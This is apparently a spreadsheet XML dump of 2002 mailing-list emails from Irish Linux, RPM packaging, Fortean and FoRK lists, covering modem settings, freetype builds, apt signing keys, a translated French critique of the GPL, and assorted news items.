Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Colin Nevin wrote:
&gt; 
&gt; Hi All,
&gt; The modem handshake works at slightly higher speeds (4800bps to
&gt; ~57600bps) but that is no good for tx/rx'ing data to the remote server
&gt; as it insists at talking at the speed of treacle/1200bps.It sounds like the flow control is set to Xon/Xoff rather than hardware.&gt; Baud 1200 7 data bits Even ParityUnusual -  8 n 1 is more common.&gt; 
&gt; I am doing a ATZ3 to reset the modem then I send this init string:
&gt; 
&gt; AT&amp;F1E1V1Q0X4Y0S32=232&amp;A1&amp;B0&amp;C1&amp;D2&amp;H0&amp;I0&amp;K1&amp;M4&amp;N0&amp;P0&amp;R1&amp;S0&amp;U0&amp;Y1I think that the AT command for hardware flow control is &amp;E4 though this
may vary from modem to modem.Regards...zzzzcc
-- 
********************************************
John McCormac            * Hack Watch News
zzzzcc@hackwatch.com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
</t>
  </si>
  <si>
    <t xml:space="preserve">zzzz@spamassassin.taint.org (Justin Mason) writes:&gt; /dev/fd/0 is STDIN -- filedescriptor 0.  Looks like the PS file wants
&gt; to know its filename, but it's being read from STDIN, that's my
&gt; guess.  I don't think so: it should be getting a stream of PS from stdin,
but it's not. The printing/spooling system is executing gs but
somehow failing to provide it with input.&gt; Try tweaking the scripts to run "gs" with the ps file on
&gt; the command line instead of as "-".That might clarify that the later part of the system works, but I
suspect the problem is earlier.B
-- 
Brendan Halpin, Dept of Government and Society, Limerick University, Ireland
Tel: w +353-61-213147 f +353-61-202569 h +353-61-390476;  Room F2-025 x 3147
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">I have translated the article in full - see 
end of post (I think that I've done a far 
better job than the Google translation - at 
least it's readable now - any corrections
appreciated).Stuff in {}'s is my (and others) additions 
to the debate.My apologies if I've paraphrased anybody 
incorrectly, I will be glad to retract if 
anyone is miffed.The article makes four main points.
1) Absence of critical clauses. 
In this case, the idea is that the licence 
is invalid because it doesn't specify
under what country's law the GPL is governed.
2) Specification in English only.That for the end user (as opposed to businesses), 
the GPL doesn't apply because it's not written 
in French.
3) Arbitary licence change.The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{David Neary makes the point that the copyright 
holder automatically retains the right to change 
the licence.Scott replies it simply requires authorisation from 
all *copyright holders*That's not my understanding. French law allows a 
GPL type licence *_on condition_* that the 
specific conditions of the granting of such
rights are clear - if they are not, there is
nothing to stop the original author taking
back "his work". The lawyers see this
(correctly IMHO) as a weakness in the GPL).}4) Hidden defects.Roughly, this clause means that the author(s) 
is/are liable for any defects if the consumer 
is not an IT engineer, so if Linux blows up 
and data is lost, then the authors are liable.
{Ciaran Johnson says that M$oft and others have 
similar clauses - the point here is that they 
are *_all_* invalid - just that this one 
affects the GPL also.Niall O'Broinn makes the point that it is not
a sale, but rather a service/leasing arrangement
and that's why it doesn't come under this point.I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 under French law.
The fact that two IP lawyers in France think that
the GPL is covered as a sale make me feel that 
there is a de facto sale and a de facto contract.}5) Roughly.There may be other reasons under French 
law why the  GPL may be invalid.-----  Whole Article. -----------
Freedom(a) is worth more than these 
imperfect licences.
Specialised lawyers look at the GPL.Lawyer Cyril Rojinsky (duly appointed to 
the court) and the jurist Vincent Grynbaum, both 
specialised in the area of intellectual property 
examine the "free" licences and in particular the 
GPL. They have published their study
in the review "Proprietes intellectuelles 
(Intellectual property)[1]" and their
conclusion is grim.
Their approach is interesting. The problem for 
them is not to know whether freedom is valid under 
French law (for them the question is a moot point)
but rather they asked themselves about the form 
and the content of the text of free licences, and 
in particular the GPL. The problem is not free 
programmes, but rather the licence contracts of 
free programmes.Absence of critical clauses.The authors tell us that first of all, the 
reference to "copyright" is not legally 
sufficient in the framework of international 
contracts  (which is the case of licence 
contracts for programmes developed and spread 
via the Internet). The idea of copyright can 
basically include differences from one country 
to another. This is why, under international 
contracts, it is necessary to specify to which 
laws one is referring (French law, American &amp;c.).The authors only found three public licences 
which were correctly formulated on this point: 
QPL, IBM Public Licence and the Mozilla Public
Licence).Specification in the English language.Next, the authors remind us that (at least in 
France), no clause in a contract may be contrary 
to French law [2]. However, it turns out that a 
licence such as the GPL is contrary to French law 
in several respects. Firstly, it is written in 
English and the FSF doesn't officially approve 
translations. The "Toubon law" obliges this sort 
of contract to be written in French, including for 
businesses since the notion of "user" applies not 
only to consumers, but also to businesses, 
professionals &amp;c. 
Contacted by the editors of LinuxFrench, 
lawyer Cyril Rojinsky declared that, as 
far as business is concerned, the "Toubon 
law" is probably doomed to change since 
it is in contradiction of European directives 
on the subject, but whatever about that, the 
problem is still valid for individuals, and 
while waiting for it (French law) to change, 
French companies have to deal with it, since 
it is the law of the land.
A programme under the GPL can suddenly 
change licence.
Another problem, much more serious, is 
that according to French law, the author of 
a free programme can, at any time, invoke 
the invalidity of the licence for this 
software by simply changing the licence.
In effect, the law of intellectual 
property stipulates that the granting of  
rights by the author is subordinate to 
the condition that each of these granted 
rights be the object of a distinct clause 
in the granting act (i.e. the licence) and 
that the granting of any such rights be 
delimited with respect to its scope and its 
grantees, and also with respect to its 
location (i.e. where such rights may be 
excersised)  and duration of any such grants. 
[3] This is not the case of the GPL nor of
other free licences. Briefly, this means 
that in France, or elsewhere if the author 
is French, that which is under the GPL could 
revert to proprietary from one day to the next. 
The problem of the guarantee "hidden defects".
An other very serious flaw is that of the 
guarantee. The GPL licences and others show 
that the software is delivered "without 
guarantee". You are going to immediately
reply that commercical programmes carry the 
same clause in their licence contracts,
and this is correct. However, whatever is 
written in a licence contract, one cannot
free oneself from the "guarantee from 
hidden defects", since it is imposed in the 
Civil Code. This concept is poorly understood 
by the layman, it protects the buyer
(whoever it may be, individual or business, 
since it specifies the Civil Code and not 
consumer protection law) against hidden 
defects, deliberate or made in good faith by 
the seller. 
For example, if one buys a pair of socks 
in a sale, and the shop has a notice 
specifying that "Sale items are neither 
refunded nor exchanged", and on arriving 
home you notice that one of the socks has 
a hole in it, several scenarios are possible.
You could have checked the socks before 
purchase: the flaw is deemed "obvious" and
you can sing for your money.
You couldn't check the socks (they were 
packaged for example), and in this case, 
despite the notice "neither refund nor 
exchange", you may invoke "hidden defect" 
and have them changed or obtain a refund, 
it's up to you. Personally, I have already invoked in shops 
the "hidden defect" clause and it always 
worked well (shopkeepers are always very 
cooperative if you quote a couple of words 
of the Civil Code). 
The concept of hidden defect is rather 
wide, it is necessary that you hadn't 
the possibility of discovering the defect 
before buying the product and then 
(according to the Civil Code) that you 
wouldn't have bought it at that price if 
you had known about the
defect.
The third case which is much rarer , is 
if you are able to show that the vendor had
knowledge of the defect (hidden), but didn't 
inform you. In this case, not only does he 
have to reimburse the product, but all 
expenses incurred by the sale (metro 
tickets to go to the shop, the fuse 
which blew when you plugged it in &amp;c.)
This idea of "hidden defect" applies to
 all products, including programmes. This 
was made abundantly clear by the 
authorities (and the courts) surrounding 
Y2K. This is particularly inconvenient for 
free programmes, since a site which 
offers a Linux distro for download is 
supposed to provide a guarantee against 
hidden flaws.
LinuxFrench asked Cyril ROJINSKY if 
in the case of a free programme, 
one could speak about a "hidden" defect 
since the source code was available, 
he replied "Actually, concerning the 
guarantee, the question of obvious 
defect will arise. This analyis will 
be different depending on whether the 
person who downloads the distribution 
is an IT professional or not". OpenSource has this advantage over 
the proprietary programme: it protects 
the distributor against a guarantee of
hidden defect insofar as the buy is an 
IT person. But, for distribution to the 
public at large, the problem remains 
the same.Roughly Speaking.
Lawyer Cyril ROJINSKY said it himself, 
this study is far from being exhaustive 
and many other areas could be explored. During this interview, we asked ourselves, 
for example, about the fragility of the 
GPL clause which forbids linking source 
code under the GPL with proprietary code. In effect, the laws of intellectual 
property give the right to the user 
to modify a programme with the
intention of permitting interoperability 
with another programme. If for that,
I need to link with a proprietary library 
(communication protocol, device driver)
I may consider as "null and void" this 
clause of the GPL.
The conclusion of this study is a wake 
up call for the community. "Freedom" 
merits more than these shoddy licences, 
which should be modified before court 
cases over them proliferate and put at 
risk the undeniable originality of 
this effort.
---------------------------
[1] Une publication de l'Institut 
de recherche en propriÃ©tÃ© 
intellectuelle, No4 Juillet 2002[2] Une telle clause de contrat 
qui est opposÃ©e Ã  ce que dit la Loi 
franÃ§aise est qualifiÃ©e en terme 
juridique de Â« clause rÃ©putÃ©e 
non-Ã©crite Â», c'est-Ã -dire 
qu'on fait comme si cette clause 
n'Ã©tait pas Ã©crite dans le contrat. C'est pour cela par exemple que vous 
pouvez signer un bail pour un 
appartement qui stipule que 
les enfants sont interdits dans 
l'immeuble, et envisager sans 
inquiÃ©tude d'avoir quand mÃªme 
un enfant, en effet le code civil 
stipule que le devoir d'un locataire 
d'un appartement doit se comporter 
en Â« bon pÃ¨re de famille Â» [3] Article L131-3___________________________________________________________
Do You Yahoo!? -- Une adresse @yahoo.fr gratuite et en franÃ§ais !
Yahoo! Mail : http://fr.mail.yahoo.com
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Quoting Breathnach, Proinnsias (Dublin) (breatpro@exchange.ie.ml.com):&gt; Is there any reliable way to calculate your connection speed if you don't
&gt; trust what the modem reports?Do a wget of a file of known length, in a script that runs "date" before
and after (or equivalent).Be aware that speed between you and your upstream link is one thing;
speed through countless congested routers to a faraway location may be
quite another.  Remember that hardware-level compression is a factor.
(The file you wget will probably be precompressed.)In the area of the slightly more exotic, be aware that different traffic
may have higher priority and thus more available bandwidth at various
points in the transit to/from you -- and that some traffic may go via 
different paths coming vs. going.Be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
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 8 Oct 2002, John Moylan wrote:
&gt; Hmm, speaking of cheap machines etc, has anyone tried this sort of
&gt; thing: http://www.mini-itx.com/projects/humidor64/ ? or more importantly
&gt; has anyone had any positive/negative experiences with the Via mini-itx
&gt; boards/via c3 processors.My laptop has a Via C3 processor. I use Debian with a self-compiled
2.4.19 kernel, and have had absolutely no problems with the chip at all
(quite the opposite, in fact).I had to compile for "686" in order for 3D acceleration to work (the
kernel has an option specifically for the Via C3), but I assume that was
a kernel problem rather than a hardware problem.Trevor Johnston-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Quoting Paul Linehan (plinehan@yahoo.com):&gt; The point here is that (under French law) the author can change the
&gt; terms of the licence arbitarily. This is because any granting of
&gt; rights by an author must be clearly delimited in terms of how long,
&gt; where, to whom, dates and times.The GPL and similar licences are explicitly permanent grants of rights
attached to an instance of his work.  (The other stuff mentioned
concerns contract law, e.g., the required element of privity, etc.)&gt; In the absence of such limitations, the original author has the right
&gt; to change his software back to closed on a whim.No,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law.The analysis, here and elsewhere, concerns contract law.  This isn't
contract law.This isn't the first time copyright attorneys have stumbled on this
subject.  I'm sure it won't be the last.--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
</t>
  </si>
  <si>
    <t xml:space="preserve">Matthias Haase wrote:
&gt; The bytecode-interpreter *is* disabled on RH8, defined at line 3 in
&gt; the Specfile of the SRPM.Right you are.  The SRPM includes a patch to enable it, but then the
specfile defaults to not applying that patch.  I saw the former but
missed the later.  Egad, what a convoluted maze.Sorry for the misinformation!_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Any one out their have any RPMs for the new KVim that was just released 
that'd be suitable for RH7.3?The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http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Laurent Papier wrote:&gt;On Tue, 8 Oct 2002 16:24:06 +0200
&gt;Matthias Saou  wrote:
&gt;
&gt;  
&gt;
&gt;&gt;Once upon a time, Roi wrote :
&gt;&gt;
&gt;&gt;    
&gt;&gt;
&gt;&gt;&gt;mplayer works with dga (if i am root) and works with x11
&gt;&gt;&gt;and always worked with sdl (but not now with redhat 8)
&gt;&gt;&gt;now it gives black screen window and play the music of the movie.
&gt;&gt;&gt;      
&gt;&gt;&gt;
&gt;&gt;Strange, because as I said in an earlier post, it works for me. Maybe
&gt;&gt;you're missing the SDL_image or something? :-/
&gt;&gt;    
&gt;&gt;
&gt;
&gt;It also works nicely for me.
&gt;
&gt;Laurent
&gt;  
&gt;[roi@roi roi]$ rpm -qa | grep -i sdl
SDL_image-devel-1.2.2-3
xmame-SDL-0.60.1-fr2
SDL_mixer-1.2.4-5
SDL-1.2.4-5
SDL-devel-1.2.4-5
SDL_mixer-devel-1.2.4-5
SDL_net-1.2.4-3
SDL_net-devel-1.2.4-3
SDL_image-1.2.2-3Seems I got all packages I need.
It worked on redhat 7.3 I did upgrade not reinstall so packages
shouldn't make a problem.Roi
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Oct 08, 2002 at 04:36:13PM +0200, Matthias Saou wrote:
&gt; Two new things today :
&gt; 
&gt; 1) I've had to install a Red Hat Linux 6.2 server because of an old
&gt; proprietary IVR software that doesn't work on newer releases :-( So
&gt; I've recompiled both the latest apt and openssh packages for it, and
&gt; they are now available with a complete "os, updates &amp; freshrpms" apt
&gt; repository at apt.freshrpms.net, for those who might be interested.Oh, neat.I have similiar thing in my hands, though it might be migratable if I
had the time to try. I've been using another 6.x repository though.
http://apt-rpm.tuxfamily.org/aptAnyone tried (dist-)upgrade from 6.x to 7? Theoretically it should drop
in some -compat's (notably libc) and upgrade the rest and after a reboot
and maybe a new kernel (and grub, but I have long before put those to
v6's :) run just fine. Haven't had a spare machine to try it on myself,
though._______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Matthias Haase wrote:
&gt; The recompile of the SPRM failed for me with:
&gt; #----
&gt; RPM build errors:
&gt;     File not found by glob:
&gt; /var/tmp/freetype-2.1.2-root/usr/lib/libttf.so.*
&gt;     File not found: /var/tmp/freetype-2.1.2-root/usr/lib/libttf.soWeird.  I had no problems at all rebuilding from the SRPM with specfile
modified to enable the bytecode interpreter.  The "check-files" test
warns that "/usr/share/aclocal/freetype2.m4" was not included in any
package, but other then that, it's all perfectly clean._______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">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welcome!It works very nice, would you consider upgrading it to 1.2.6 released only a
few hours after your build?Thanks!On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Axel.Thimm@physik.fu-berlin.de_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">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errorHas anyone seen this before and know how to fix it?  Or should I file a
bug report?  Thanks for your help.  - Jon-- 
jon@tgpsolutions.comAdministrator, tgpsolutions
http://www.tgpsolutions.com
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">
I posted about this last week, and I'm still stumped.  apt-get is just
not working for me, and I can't figure out what the problem is.I've tried removing the apt rpms, making sure to remove any traces left
behind (/etc/apt /var/state/apt /var/cache/apt), and still, I get
"couldn't find package xmms-mp3" when running "apt-get install xmms-mp3".Any clues?  Here's a log of a fresh try:root@canarsie:/tmp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me..-SteveK-- 
  Steve Kann - Chief Engineer - 520 8th Ave #2300 NY 10018 -  (212) 533-1775
                HorizonLive.com - collaborate . interact . learn
   "The box said 'Requires Windows 95, NT, or better,' so I installed Linux."_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 2002-10-07 at 13:28, Matthias Saou wrote:&gt; I've never heard of any CD-ROM or DVD-ROM drive having problems with DMA...
&gt; although there probably is since Red Hat decided to default disabling it a
&gt; few releases back :-/Heh. I get to see bad CDROM problems all the time. Mostly when vendors
buy crap cables to try to save $0.02/each, but there are chipsets and
drives with known DMA issues as well.&gt;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;-)Usually if you enable DMA on a CDROM that can't handle it gracefully you
won't be able to read data off it relably, and that's about it. No
end_of_the_world problems, and easily fixed.&gt; I guess I'll settle for the /dev/dvd link change as described and putting
&gt; the DMA tip in the %description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Chris Kloiber
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 2002-10-08 at 04:48, Panu Matilainen wrote:
&gt; On Mon, 7 Oct 2002, Jesse Keating wrote:
&gt; 
&gt; &gt; On Mon, 7 Oct 2002 19:28:51 +0200
&gt; &gt; Matthias Saou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:)Odd. Did I certify that one? What's the 7-digit IBM model number, and
which version of Red Hat were you running?-- 
Chris Kloiber
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>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interested.Gack. Did you try 7.3 with the compat-glibc first? Or does it require an
antique kernel?-- 
Chris Kloiber
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 08 Oct 2002 13:05:53 -0700
Ben Liblit  wrote:&gt;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Ben,it seems, the RH freetype package should be repacked,
see for this
https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=74415Please, can you atach and send your sucessfully rebuild of the RH freetype
rpm with the bytecode enabled to me?-- 
  Regards from Germany
                     Matthias_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">I wrote:
&gt; [The bytecode interpreter] may improve non-antialiased rendering, but
&gt; only at the expense of making a mess of antialiased rendering.Then again, perhaps the particular font I'm using just has bad
bytecodes.  That font is "QuickType II", grabbed off my Windows
partition, where it was installed by I-have-no-idea-which-application.Anybody else experimenting with bytecode-enabled freetype, presumably
with different fonts?  Do you find the same bad antialiased rendering
that I found, or do other fonts work well?_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Chris wrote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kernel?It requires a 2.2 kernel, plus antique just-about-everything :-/ Real crap!Matthias-- 
Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi
Load : 0.00 0.03 0.00_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 08 Oct 2002 23:15:07 -0700
Ben Liblit  wrote:&gt; Ick.  Perhaps this is why Red Hat turned the bytecode interpreter off. 
&gt; It may improve non-antialiased rendering, but only at the expense of 
&gt; making a mess of antialiased rendering.
&gt; 
&gt; This may come down to a matter of personal aesthetics, but for my part, 
&gt; I'm going back to Red Hat's standard packages with the bytecode 
&gt; interpreter turned *off*.
Yes, confirmed, but for my part, I'm using mostly non-antialiased fonts
and 
they are true ugly without the bytecode interpreter enabled.Remember my stupid request about your RPM ;-)
--
  Regards from Germany
                     Matthias
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi.Brian Fahrlander  wrote:&gt;     What's it take to ensure we're covered against this kind of
&gt;     childish/moronic/Microsoft-era problems?Well, I am checking the packet signatures while building the apt-tree.
Not very pretty, not very fast, but it works.Nonetheless:
did anyone ever play with this:
http://distro.conectiva.com.br/pipermail/apt-rpm/2002-August/000653.html-- 
R!_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Brian wrote :&gt;      OK, it's now time to work out the PGP securing of apt repository
&gt;      traffic. I've never gotten anything but "sitename.whatever will not
&gt;      be authenticated" until running Redhat 8.0 when I get something
&gt;      about having "No Key" for various files.I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up.In Red Hat Linux 8.0 though, the warnings about "No Key" appear until you
import the right gpg public keys directly with rpm, for example :
rpm --import /usr/share/doc/apt-0.5.4cnc7/RPM-GPG-KEY
(this will import my key, which is used to sign all freshrpms.net packages)Hopefully it is possible to the tell rpm to install *only* packages who
verify against an imported gpg key? This for me would be the optimal way to
ensure integrity with the way things curently work.Matthias-- 
Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi
Load : 0.14 0.18 0.17_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 9 Oct 2002 11:03:11 +0200, Matthias Saou  wrote:&gt;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Brian FahrlÃ¤nder              Linux Zealot, Conservative, and Technomad
Evansville, IN                    My Voyage: http://www.CounterMoon.com
ICQ  5119262
------------------------------------------------------------------------
angegangen, Schlange-HÃ¼ften, sein es ganz rÃ¼ber jetzt. BÃ¼gel innen fest,
weil es eine lange, sÃ¼sse Fahrt ist. _______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Looks and sounds a hell of a lot like Clare's cat, Violence...A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camera.Steve Gardiner, 41, claims to have spotted the large cat in his garden in 
Upton Road, Plumstead, in the sixth reported sighting in Woolwich and Bexley 
in just four weeks.Mr Gardiner told News Shopper he watched the big cat as it walked alongside 
the house at about 7.15am, on Wednesday, September 25, while his security 
cameras captured it on film.The father-of-four described the black cat as about 3ft long and 
two-and-a-half-foot high, with a large body.He said: "It prowled past the patio doors moving with all the mannerisms of 
a hunter."It looked at me calmly before moving on."The bricklayer told how his work colleagues let him know News Shopper had 
been following the big cat story so he decided to call our offices with news 
of the sighting.His wife, Karen, 41, later checked the tape which had captured grainy images 
of the large cat prowling through their garden.She said: "I feel sorry for it not living in its natural habitat I'd hate 
for it to get hurt."Mr Gardiner told how he is convinced of the cat's existence saying how their 
usually quiet 18-year-old dog barks at "nothing" in the garden but barked 
that morning.He warned: "I don't think these cats are dangerous but, if cornered, they 
might jump you."Sightings of the large black cat are being reported all over the Plumstead 
Common and Shooters Hill as well at the Bexley area.If you have seen the big cat, call News Shopper on 01689 885712.12:27 Tuesday 8th October 2002_________________________________________________________________
Send and receive Hotmail on your mobile device: http://mobile.msn.com
------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
Sell a Home for Top $
http://us.click.yahoo.com/RrPZMC/jTmEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">http://news.bbc.co.uk/1/hi/uk/2310209.stmTuesday, 8 October, 2002, 13:53 GMT 14:53 UK
Quiz: Know your Cockney Rhyming Slang?Cockney Rhyming Slang is alive and well with new terms being invented all
the time, according to the new Oxford Dictionary of Rhyming Slang being
published this week.
But do you know a Raquel Welch (belch) from a Billie Piper (windscreen
wiper)?
...------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
Plan to Sell a Home?
http://us.click.yahoo.com/J2SnNA/y.lEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">http://www.thisislocallondon.co.uk/news/weird/display.var.633932.Bizarre+London.0.htmlAn investigation has been launched after punch bags on sale in Greenwich 
were found to be stuffed with incontinence pads and bandages.Trading standards officers, working for Greenwich Council, were alerted to 
the situation after a Bryan punch bag, purchased in Argos, in Charlton Road, 
Charlton, was found to be full of bandages.Also stuffed inside the piece of sporting equipment was a letter from a 
woman in Fife stating how she felt quite disgusted' about the bag and asking 
for the filling to be tested.The unfortunate shopper had bought his first bag, at Argos, in Lewisham High 
Street, but had returned it because on investigation of a leak he was 
horrified to discover it was filled with incontinence pads.So far, officers have purchased two of the punch bags, only to find they 
contain incontinence pads and strips of shredded duvet.Cabinet member for public services Councillor Angela Cornforth said: "This 
is one of the strangest stories I have every heard."Our officers are in the process of investigating and will no doubt discover 
why the bags contain such unusual contents."12:18 Tuesday 8th October 2002
_________________________________________________________________
Chat with friends online, try MSN Messenger: http://messenger.msn.com
------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
Plan to Sell a Home?
http://us.click.yahoo.com/J2SnNA/y.lEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t>On Sat, 24 Aug 2002, Adam L. Beberg wrote:--]And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
  </si>
  <si>
    <t>&gt; If the creator didnt say you could have it without paying, it's theft, so
&gt; simple, hell that's even in all the major holy books.Wow, I've got a great idea!  I'll hire a skywriter to write "you can't
look at this without paying," then lock up everybody who looked at it and
didn't pay!  It can't fail -- Jesus is on my side!
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>Lucas Gonze:
&gt;Senders should vary the recipient list to include non-targets, like party 
&gt;officials, and to exclude targets enough to give them plausible 
&gt;deniability.Which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http://photos.msn.com/support/worldwide.aspxhttp://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>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machine.You choose to have your email client do that.  You don't have to.  Short
of Palladium, you can do whatever you want with bytes you hold, including
reading messages and erasing the traces.  I'll buy a chocolate sundae for
anyone who can show otherwise.An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VM.The only exception to the rule that your machine belongs to you is --
maybe -- Palladium.- Lucas
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t xml:space="preserve">
--- begin forwarded text
Date: Sat, 24 Aug 2002 11:39:34 -0400
To: "R. A. Hettinga" 
From: Somebody
Subject: Re: "Ouch. Ouch. Ouch. Ouch. Ouch...."(was Re: My brain hurts)And then there was the one from Prairie Home Companion:Q. Why is a viola larger than a violin?
A. It  just looks that way because a violin player's head is bigger.
&gt;--- begin forwarded text
&gt;
&gt;
&gt;Status: RO
&gt;Delivered-To: fork@spamassassin.taint.org
&gt;From: "Joseph S. Barrera III" 
&gt;Organization: Rose Garden Funeral of Sores
&gt;User-Agent: Mutt/1.5.0 [-1214711651]
&gt;To: Flatware or Road Kill?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&gt;The Internet Bearer Underwriting Corporation 
&gt;44 Farquhar Street, Boston, MA 02131 USA
&gt;"... however it may deserve respect for its usefulness and antiquity,
&gt;[predicting the end of the world] has not been found agreeable to
&gt;experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
-- --- end forwarded text
-- 
R. A. Hettinga 
The Internet Bearer Underwriting Corporation 
44 Farquhar Street, Boston, MA 02131 USA
"Never underestimate the power of stupid people in large groups."
--George Carlin
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
Adam
&gt; L. Beberg&gt; 
&gt; If the creator didnt say you could have it without paying, it's theft,
so
&gt; simple, hell that's even in all the major holy books.Ran across a site which claimed to explain the original meaning of the
Ten Commandments.  It seems some of those meanings have evolved a bit,
too.In particular, there was a claim that the commandment on stealing was
actually specifically about 'man stealing -- selling a free man into
slavery.  Certainly the US southerners were particularly sensitive to
the term 'man stealer' in a way I didn't understand.Yep, I know he said all holy books.  No, I don't know if this site was
blowing hot air.  It just read like someone had done their homework.http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>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far!Rohitkhare@alumni.caltech.edu
Texas Pacific Goes Where Others Fear to SpendAugust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billion. It is also bidding
for Bankgesellschaft Berlin, a large and troubled bank. The most creative, and potentially lucrative, of these
deals could be Texas Pacific's acquisition last November of
MEMC Electronic Materials, a semiconductor company, for $6
- yes, just $6 - in cash. It will also guarantee a $150
million bank loan. In the last few years, most firms that specialize in
leveraged buyouts - the use of junk bonds, bank loans and
other borrowings to buy or take big stakes in companies -
have been largely inactive. Falling stock prices have made
managements reluctant to sell cheaply. Companies that are
for sale have tangled finances or face a cash squeeze. Texas Pacific is different. "This is a terrific environment
for them," said Stephen Schwarzman, chief executive of the
Blackstone Group, which also specializes in buyouts. Mark Attanasio, a managing director at Trust Company of the
West, which has invested with Texas Pacific, said: "Most
other buyout firms want to buy companies that are growing.
You don't see many guys wanting to take on operational
fixes." Like most other buyout firms, Texas Pacific tries to keep
its inner workings private: its partners rarely grant
interviews and its Web site is perpetually under
construction. Mr. Bonderman, Mr. Coulter and William Price,
the third founding partner, declined to be interviewed for
this article. Mr. Bonderman, 59, is known for his rumpled shirts and
bright, patterned socks. "He likes argyle socks, and they
tend to fall down around his ankles," said Henry Miller, an
investment banker who advises troubled companies. Early in
his career, when he was a Washington lawyer, Mr. Bonderman
argued a case in court wearing a brown velvet suit. When a Texas Pacific deal is being negotiated, he is known
for obsessively staying in touch, even when he is trekking
in places like Pakistan, Nepal and, most recently, Bhutan.
"Whenever I see a long, unfamiliar phone number pop up on
my caller I.D., I know it's David calling," said one
investment banker who often works with Mr. Bonderman. Mr. Bonderman made his reputation in the 1980's as the
chief investment officer for Robert Bass, the Texas oilman.
Mr. Bonderman enriched Mr. Bass a second time by making
early bets in industries like cable television and taking
stakes in troubled companies like American Savings &amp; Loan,
which had been seized by the government. Over nearly a
decade, Mr. Bonderman's picks earned an average annual
return of 63 percent for Mr. Bass. In 1993, Mr. Bonderman struck out on his own with Mr.
Coulter, a former Lehman Brothers banker who had also
